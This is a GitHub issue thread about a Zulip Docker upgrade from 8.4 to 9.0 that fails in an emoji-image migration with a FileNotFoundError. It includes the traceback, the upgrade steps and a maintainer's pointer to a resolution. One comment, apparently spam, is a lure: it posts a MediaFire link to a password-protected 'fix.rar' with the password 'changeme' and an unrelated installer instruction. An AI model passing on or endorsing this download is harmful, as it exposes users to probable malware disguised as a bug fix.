### ISSUE TITLE
Zulip migration failed from 8.4.0 to 9.0.0: FileNotFoundError

### ISSUE THREAD

**Issue by fritsche** [zulip/docker-zulip#457]
Hello, 

I am trying to update from v8.4 to v9.0 but I am having issues with this image not found: `/home/zulip/uploads/avatars/2/emoji/images/1.png.original`

Did any of you have had the same issue and fixed it?

Here are the logs:

```
  Applying zerver.0553_copy_emoji_images...Processed 0 custom emoji
Traceback (most recent call last):
  File "/home/zulip/deployments/current/manage.py", line 150, in <module>
    execute_from_command_line(sys.argv)
  File "/home/zulip/deployments/current/manage.py", line 115, in execute_from_command_line
    utility.execute()
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/core/management/__init__.py", line 436, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/core/management/base.py", line 413, in run_from_argv
    self.execute(*args, **cmd_options)
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/core/management/base.py", line 459, in execute
    output = self.handle(*args, **options)
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/core/management/base.py", line 107, in wrapper
    res = handle_func(*args, **kwargs)
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/core/management/commands/migrate.py", line 356, in handle
    post_migrate_state = executor.migrate(
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/db/migrations/executor.py", line 135, in migrate
    state = self._migrate_all_forwards(
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/db/migrations/executor.py", line 167, in _migrate_all_forwards
    state = self.apply_migration(
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/db/migrations/executor.py", line 252, in apply_migration
    state = migration.apply(state, schema_editor)
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/db/migrations/migration.py", line 132, in apply
    operation.database_forwards(
  File "/srv/zulip-venv-cache/7593f4bb3564326b816f1a6074daeee1909cd732/zulip-py3-venv/lib/python3.10/site-packages/django/db/migrations/operations/special.py", line 193, in database_forwards
    self.code(from_state.apps, schema_editor)
  File "/home/zulip/deployments/2024-07-25-21-09-06/zerver/migrations/0553_copy_emoji_images.py", line 353, in thumbnail_emoji
    thumbnail_local_emoji(apps)
  File "/home/zulip/deployments/2024-07-25-21-09-06/zerver/migrations/0553_copy_emoji_images.py", line 160, in thumbnail_local_emoji
    with open(copy_from_path, "rb") as fh:
FileNotFoundError: [Errno 2] No such file or directory: '/home/zulip/uploads/avatars/2/emoji/images/1.png.original'
Zulip migration failed with exit code 1. Exiting.
```

The steps I am following to upgrade are:
- Stop the container
- Update my docker-compose.yml to use 9.0 instead of 8.4
- Start the containers with docker compose 

They are the same steps we used to update from previous versions to 8.4.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by fritsche** [comment]
Accessing the container it has the folder from the error message, but files start at `138.jpeg.original`.

**Comment by timabbott** [comment]
I'm pretty this was resolved via https://chat.zulip.org/#narrow/stream/31-production-help/topic/9.2E0.20migration.20fails.20due.20to.20missing.20.2Eoriginal.20avatars/near/1932321.
